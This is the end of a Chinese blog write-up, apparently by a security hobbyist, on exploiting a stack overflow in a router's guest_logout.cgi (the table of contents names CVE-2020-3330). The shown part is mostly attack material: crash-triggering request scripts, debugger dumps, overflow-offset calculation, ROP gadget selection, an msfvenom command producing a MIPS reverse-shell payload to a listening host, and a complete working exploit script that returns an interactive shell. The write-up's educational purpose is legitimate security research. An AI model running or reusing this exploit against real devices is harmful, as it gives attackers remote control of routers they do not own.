<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;https://192.168.1.1/guest_logout.cgi&quot;</span></span><br><span class="line">payload = &#123;<span class="string">&quot;cmac&quot;</span>:<span class="string">&quot;12:af:aa:bb:cc:dd&quot;</span>,<span class="string">&quot;submit_button&quot;</span>:<span class="string">&quot;status_guestnet.asp&quot;</span>+<span class="string">&#x27;a&#x27;</span>*<span class="number">100</span>,<span class="string">&quot;cip&quot;</span>:<span class="string">&quot;192.168.1.100&quot;</span>&#125;</span><br><span class="line"><span class="comment">#requests.get(url, data=payload, verify=False, timeout=1)</span></span><br><span class="line">requests.post(url, data=payload, verify=<span class="literal">False</span>, timeout=<span class="number">1</span>)</span><br></pre></td></tr></table></figure>

<p>此时可在<code>gdb-multiarch</code>终端看到</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">0x61616161 <span class="keyword">in</span> ?? ()</span><br><span class="line">LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA</span><br><span class="line">─────────────────────────────────[ REGISTERS ]──────────────────────────────────</span><br><span class="line">*V0   0x0</span><br><span class="line">*V1   0x73</span><br><span class="line">*A0   0x4d81f2 (post_buf+66) ◂— <span class="string">&#x27;tatus_guestnet.aspaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&#x27;</span></span><br><span class="line">*A1   0x47f785 ◂— <span class="string">&#x27;ogin_guest.asp&#x27;</span></span><br><span class="line">*A2   0x168</span><br><span class="line">*A3   0x4fa608 ◂— 0x0</span><br><span class="line">*T0   0x4fa5b0 ◂— 0x0</span><br><span class="line">*T1   0x4fa5b0 ◂— 0x0</span><br><span class="line">*T2   0x111</span><br><span class="line">*T3   0xfffffff0</span><br><span class="line">*T4   0x61616161 (<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">*T5   0x2b030004 (__ctype_b) —▸ 0x2afeabc0 (__C_ctype_b_data+256) ◂— 0x2000200</span><br><span class="line">*T6   0xca5fb1e</span><br><span class="line">*T7   0x61616161 (<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">*T8   0x1</span><br><span class="line">*T9   0x2afc64d0 (strcoll) ◂— lbu    <span class="variable">$v1</span>, (<span class="variable">$a0</span>)</span><br><span class="line">*S0   0x61616161 (<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">*S1   0x61616161 (<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">*S2   0x61616161 (<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">*S3   0x61616161 (<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">*S4   0x61616161 (<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">*S5   0x61616161 (<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">*S6   0x61616161 (<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">*S7   0x61616161 (<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">*S8   0x61616161 (<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">*FP   0x7fce1458 ◂— <span class="string">&#x27;aaaaaaaaaaa&#x27;</span></span><br><span class="line">*SP   0x7fce1458 ◂— <span class="string">&#x27;aaaaaaaaaaa&#x27;</span></span><br><span class="line">*PC   0x61616161 (<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">───────────────────────────────────[ DISASM ]───────────────────────────────────</span><br><span class="line">Invalid address 0x61616161</span><br><span class="line"></span><br><span class="line">───────────────────────────────────[ STACK ]────────────────────────────────────</span><br><span class="line">00:0000│ fp sp  0x7fce1458 ◂— <span class="string">&#x27;aaaaaaaaaaa&#x27;</span></span><br><span class="line">... ↓</span><br><span class="line">02:0008│        0x7fce1460 ◂— 0x616161 /* <span class="string">&#x27;aaa&#x27;</span> */</span><br><span class="line">03:000c│        0x7fce1464 ◂— 0x0</span><br><span class="line">04:0010│        0x7fce1468 —▸ 0x7fce1bc8 ◂— <span class="string">&#x27;guest_logout.cgi&#x27;</span></span><br><span class="line">... ↓</span><br><span class="line">06:0018│        0x7fce1470 —▸ 0x4d81b0 (post_buf) ◂— <span class="string">&#x27;cmac&#x27;</span></span><br><span class="line">07:001c│        0x7fce1474 ◂— 0x0</span><br><span class="line">─────────────────────────────────[ BACKTRACE ]──────────────────────────────────</span><br><span class="line"> ► f 0 61616161</span><br><span class="line">────────────────────────────────────────────────────────────────────────────────</span><br></pre></td></tr></table></figure>

<p>可以看到寄存器被控制，可以利用该漏洞</p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><h4 id="确认溢出长度"><a href="#确认溢出长度" class="headerlink" title="确认溢出长度"></a>确认溢出长度</h4><p>用<code>pwntools</code>的<code>cyclic</code>进行发包测试，脚本如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;https://192.168.1.1/guest_logout.cgi&quot;</span></span><br><span class="line">payload = &#123;<span class="string">&quot;cmac&quot;</span>:<span class="string">&quot;12:af:aa:bb:cc:dd&quot;</span>,<span class="string">&quot;submit_button&quot;</span>:<span class="string">&quot;status_guestnet.asp&quot;</span>+cyclic(<span class="number">100</span>),<span class="string">&quot;cip&quot;</span>:<span class="string">&quot;192.168.1.100&quot;</span>&#125;</span><br><span class="line">requests.post(url, data=payload, verify=<span class="literal">False</span>, timeout=<span class="number">1</span>)</span><br></pre></td></tr></table></figure>

<p>得到gdb寄存器值如下，可以看到pc对应<code>aaaw</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">─────────────────────────────────[ REGISTERS ]──────────────────────────────────</span><br><span class="line">*V0   0x0</span><br><span class="line">*V1   0x73</span><br><span class="line">*A0   0x4d81f2 (post_buf+66) ◂— <span class="string">&#x27;tatus_guestnet.aspaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa&#x27;</span></span><br><span class="line">*A1   0x47f785 ◂— <span class="string">&#x27;ogin_guest.asp&#x27;</span></span><br><span class="line">*A2   0x68</span><br><span class="line">*A3   0x4fa3d8 ◂— 0x0</span><br><span class="line">*T0   0x4fa380 ◂— 0xa9958270</span><br><span class="line">*T1   0x4fa380 ◂— 0xa9958270</span><br><span class="line">*T2   0x11</span><br><span class="line">*T3   0xfffffff0</span><br><span class="line">*T4   0x61617361 (<span class="string">&#x27;asaa&#x27;</span>)</span><br><span class="line">*T5   0x2b030004 (__ctype_b) —▸ 0x2afeabc0 (__C_ctype_b_data+256) ◂— 0x2000200</span><br><span class="line">*T6   0xca5fb1e</span><br><span class="line">*T7   0x61617461 (<span class="string">&#x27;ataa&#x27;</span>)</span><br><span class="line">*T8   0x3</span><br><span class="line">*T9   0x2afc64d0 (strcoll) ◂— lbu    <span class="variable">$v1</span>, (<span class="variable">$a0</span>)</span><br><span class="line">*S0   0x6e616161 (<span class="string">&#x27;aaan&#x27;</span>)</span><br><span class="line">*S1   0x6f616161 (<span class="string">&#x27;aaao&#x27;</span>)</span><br><span class="line">*S2   0x70616161 (<span class="string">&#x27;aaap&#x27;</span>)</span><br><span class="line">*S3   0x71616161 (<span class="string">&#x27;aaaq&#x27;</span>)</span><br><span class="line">*S4   0x72616161 (<span class="string">&#x27;aaar&#x27;</span>)</span><br><span class="line">*S5   0x73616161 (<span class="string">&#x27;aaas&#x27;</span>)</span><br><span class="line">*S6   0x74616161 (<span class="string">&#x27;aaat&#x27;</span>)</span><br><span class="line">*S7   0x75616161 (<span class="string">&#x27;aaau&#x27;</span>)</span><br><span class="line">*S8   0x76616161 (<span class="string">&#x27;aaav&#x27;</span>)</span><br><span class="line">*FP   0x7fa20458 ◂— <span class="string">&#x27;aaaxaaayaaa&#x27;</span></span><br><span class="line">*SP   0x7fa20458 ◂— <span class="string">&#x27;aaaxaaayaaa&#x27;</span></span><br><span class="line">*PC   0x77616161 (<span class="string">&#x27;aaaw&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>使用<code>pwntools</code>的cyclic_find函数，得到溢出长度为85</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">ssr@ubuntu:~/iot/rv110w$ python</span><br><span class="line">Python 2.7.12 (default, Oct  5 2020, 13:56:01) </span><br><span class="line">[GCC 5.4.0 20160609] on linux2</span><br><span class="line">Type <span class="string">&quot;help&quot;</span>, <span class="string">&quot;copyright&quot;</span>, <span class="string">&quot;credits&quot;</span> or <span class="string">&quot;license&quot;</span> <span class="keyword">for</span> more information.</span><br><span class="line">&gt;&gt;&gt; from pwn import *</span><br><span class="line">&gt;&gt;&gt; cyclic_find(<span class="string">&quot;aaaw&quot;</span>)</span><br><span class="line">85</span><br></pre></td></tr></table></figure>

<h4 id="空字节绕过"><a href="#空字节绕过" class="headerlink" title="空字节绕过"></a>空字节绕过</h4><p>由于溢出点是sscanf，若payload中有NULL字节则会被截断，所以需要绕过00.</p>
<p>用IDA的mipsrop插件查看httpd本身的gadget，可以发现程序地址本身包含00，无法调用，且程序没有开启PIE，无法满足要求</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Python&gt;mipsrop.stackfinder()</span><br><span class="line">----------------------------------------------------------------------------------------------------------------</span><br><span class="line">|  Address     |  Action                                              |  Control Jump                          |</span><br><span class="line">----------------------------------------------------------------------------------------------------------------</span><br><span class="line">|  0x00409A14  |  addiu <span class="variable">$v1</span>,<span class="variable">$sp</span>,0x178+var_158                         |  jalr  <span class="variable">$s2</span>                             |</span><br><span class="line">|  0x00409A44  |  addiu <span class="variable">$s0</span>,<span class="variable">$sp</span>,0x178+var_64                          |  jalr  <span class="variable">$s2</span> </span><br></pre></td></tr></table></figure>

<p>考虑使用动态库中的gadget。在这一设备中，相同的二进制程序启动的libc基址是相同的，对于httpd，libc的基址为<code>0x2af98000</code>,可以使用该库内的gadget</p>
<p>对于shellcode，这里使用<code>msfvenom</code>生成，具体方法为</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p linux/mipsle/shell_reverse_tcp  LHOST=192.168.1.100 LPORT=8888 --arch mipsle --platform linux -f py -o shellcode.py </span><br></pre></td></tr></table></figure>

<p>生成的shellcode内容如下，不带00且满足要求</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">buf =  <span class="string">b&quot;&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\xfa\xff\x0f\x24\x27\x78\xe0\x01\xfd\xff\xe4\x21\xfd&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\xff\xe5\x21\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\x01\x01\xff\xff\xa2\xaf\xff\xff\xa4\x8f\xfd\xff\x0f&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\x34\x27\x78\xe0\x01\xe2\xff\xaf\xaf\x22\xb8\x0e\x3c&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\x22\xb8\xce\x35\xe4\xff\xae\xaf\x01\x64\x0e\x3c\xc0&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\xa8\xce\x35\xe6\xff\xae\xaf\xe2\xff\xa5\x27\xef\xff&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24\x0c\x01\x01&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\x01\xfd\xff\x11\x24\x27\x88\x20\x02\xff\xff\xa4\x8f&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\x21\x28\x20\x02\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\xff\x10\x24\xff\xff\x31\x22\xfa\xff\x30\x16\xff\xff&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\x06\x28\x62\x69\x0f\x3c\x2f\x2f\xef\x35\xec\xff\xaf&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\xaf\x73\x68\x0e\x3c\x6e\x2f\xce\x35\xf0\xff\xae\xaf&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\xf4\xff\xa0\xaf\xec\xff\xa4\x27\xf8\xff\xa4\xaf\xfc&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\xff\xa0\xaf\xf8\xff\xa5\x27\xab\x0f\x02\x24\x0c\x01&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\x01\x01&quot;</span></span><br></pre></td></tr></table></figure>

<p>接下来使用ret2libc方法构建rop，lic库文件为<code>libc.so.0</code>，使用mipsrop可找到gadget，共有32gadget，这里使用一个跳转到s3的gadget，找到对应的间接跳转到a0的寄存器。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">|  0x00025CAC  |  addiu <span class="variable">$a0</span>,<span class="variable">$sp</span>,0x38+var_20                           |  jalr  <span class="variable">$s3</span> </span><br><span class="line">|  0x0003D050  |  move <span class="variable">$t9</span>,<span class="variable">$a0</span>                                        |  jalr  <span class="variable">$a0</span> </span><br></pre></td></tr></table></figure>

<p>原本是准备使用一个跳转到s0的gadget，但发现其虽然在mipsrop找出来符合修改a0的条件，但跳转到该位置才发现不符合，故换了一个gadget</p>
<p>之前已找到控制ra的偏移值为85，可以在IDA中查看函数段的末尾，可以发现控制s3的偏移值为24，最终完成的脚本如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests,thread</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch=<span class="string">&#x27;mips&#x27;</span>,endian=<span class="string">&#x27;little&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#开启监听线程</span></span><br><span class="line">io = listen(<span class="number">8888</span>)</span><br><span class="line"><span class="comment">#libc基址和gadget地址</span></span><br><span class="line">url=<span class="string">&quot;https://192.168.1.1/guest_logout.cgi&quot;</span></span><br><span class="line">libc = <span class="number">0x2af98000</span></span><br><span class="line">jar_a0=<span class="number">0x0003D050</span>+libc   <span class="comment">#move $t9,$a0 </span></span><br><span class="line">jar_s3=<span class="number">0x00025CAC</span>+libc   <span class="comment">#addiu $a0,$sp,0x38+var_10  </span></span><br><span class="line"><span class="comment">#shellcode</span></span><br><span class="line">buf =  <span class="string">b&quot;&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\xfa\xff\x0f\x24\x27\x78\xe0\x01\xfd\xff\xe4\x21\xfd&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\xff\xe5\x21\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\x01\x01\xff\xff\xa2\xaf\xff\xff\xa4\x8f\xfd\xff\x0f&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\x34\x27\x78\xe0\x01\xe2\xff\xaf\xaf\x22\xb8\x0e\x3c&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\x22\xb8\xce\x35\xe4\xff\xae\xaf\x01\x64\x0e\x3c\xc0&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\xa8\xce\x35\xe6\xff\xae\xaf\xe2\xff\xa5\x27\xef\xff&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24\x0c\x01\x01&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\x01\xfd\xff\x11\x24\x27\x88\x20\x02\xff\xff\xa4\x8f&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\x21\x28\x20\x02\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\xff\x10\x24\xff\xff\x31\x22\xfa\xff\x30\x16\xff\xff&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\x06\x28\x62\x69\x0f\x3c\x2f\x2f\xef\x35\xec\xff\xaf&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\xaf\x73\x68\x0e\x3c\x6e\x2f\xce\x35\xf0\xff\xae\xaf&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\xf4\xff\xa0\xaf\xec\xff\xa4\x27\xf8\xff\xa4\xaf\xfc&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\xff\xa0\xaf\xf8\xff\xa5\x27\xab\x0f\x02\x24\x0c\x01&quot;</span></span><br><span class="line">buf += <span class="string">b&quot;\x01\x01&quot;</span></span><br><span class="line"></span><br><span class="line">payload=<span class="string">&quot;status_guestnet.asp&quot;</span>+<span class="string">&#x27;a&#x27;</span>*<span class="number">61</span>+p32(jar_a0)+<span class="string">&#x27;a&#x27;</span>*<span class="number">20</span>+p32(jar_s3)+<span class="string">&#x27;a&#x27;</span>*<span class="number">0x18</span>+buf</span><br><span class="line">payload = &#123;<span class="string">&quot;cmac&quot;</span>:<span class="string">&quot;12:af:aa:bb:cc:dd&quot;</span>,<span class="string">&quot;submit_button&quot;</span>:payload,<span class="string">&quot;cip&quot;</span>:<span class="string">&quot;192.168.1.100&quot;</span>&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">attack</span>():</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        requests.post(url, data=payload, verify=<span class="literal">False</span>, timeout=<span class="number">1</span>)</span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        <span class="keyword">pass</span></span><br><span class="line">    </span><br><span class="line">thread.start_new_thread(attack,())</span><br><span class="line">io.wait_for_connection()</span><br><span class="line">log.success(<span class="string">&quot;getshell&quot;</span>)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="获取shell后的操作"><a href="#获取shell后的操作" class="headerlink" title="获取shell后的操作"></a>获取shell后的操作</h3>
    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/11/23/PWN-MIPS-mpwn/" rel="prev" title="PWN-MIPS-mpwn">
      <i class="fa fa-chevron-left"></i> PWN-MIPS-mpwn
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/12/17/%E7%A5%A5%E4%BA%91%E6%9D%AFre-writeup/" rel="next" title="祥云杯re-writeup">
      祥云杯re-writeup <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="nav-number">1.</span> <span class="nav-text">端口扫描</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9B%BA%E4%BB%B6%E6%8F%90%E5%8F%96%E4%B8%8E%E8%A7%A3%E5%8C%85"><span class="nav-number">2.</span> <span class="nav-text">固件提取与解包</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E4%BF%A1%E6%81%AF"><span class="nav-number">3.</span> <span class="nav-text">漏洞信息</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#CVE-2020-3330"><span class="nav-number">3.1.</span> <span class="nav-text">CVE-2020-3330</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%94%BB%E5%87%BB%E7%9B%AE%E6%A0%87"><span class="nav-number">4.</span> <span class="nav-text">攻击目标</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%9B%BA%E4%BB%B6%E6%90%9C%E7%B4%A2"><span class="nav-number">4.1.</span> <span class="nav-text">固件搜索</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AB%AF%E5%8F%A3%E5%88%86%E6%9E%90"><span class="nav-number">4.2.</span> <span class="nav-text">端口分析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%9B%AE%E6%A0%87%E5%88%86%E6%9E%90"><span class="nav-number">4.3.</span> <span class="nav-text">目标分析</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%9B%BA%E4%BB%B6%E5%AF%B9%E6%AF%94"><span class="nav-number">4.3.1.</span> <span class="nav-text">固件对比</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%94%A8requests%E5%8F%91%E5%8C%85%E6%B5%8B%E8%AF%95%E8%AF%A5%E7%A8%8B%E5%BA%8F"><span class="nav-number">4.4.</span> <span class="nav-text">用requests发包测试该程序</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%B0%83%E8%AF%95%E7%A8%8B%E5%BA%8F"><span class="nav-number">4.5.</span> <span class="nav-text">调试程序</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="nav-number">5.</span> <span class="nav-text">漏洞利用</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%A1%AE%E8%AE%A4%E6%BA%A2%E5%87%BA%E9%95%BF%E5%BA%A6"><span class="nav-number">5.1.</span> <span class="nav-text">确认溢出长度</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%A9%BA%E5%AD%97%E8%8A%82%E7%BB%95%E8%BF%87"><span class="nav-number">5.2.</span> <span class="nav-text">空字节绕过</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96shell%E5%90%8E%E7%9A%84%E6%93%8D%E4%BD%9C"><span class="nav-number">6.</span> <span class="nav-text">获取shell后的操作</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Hyacinthum</p>
  <div class="site-description" itemprop="description">昼短苦夜长，何不秉烛游</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">17</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Hyacinthum</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
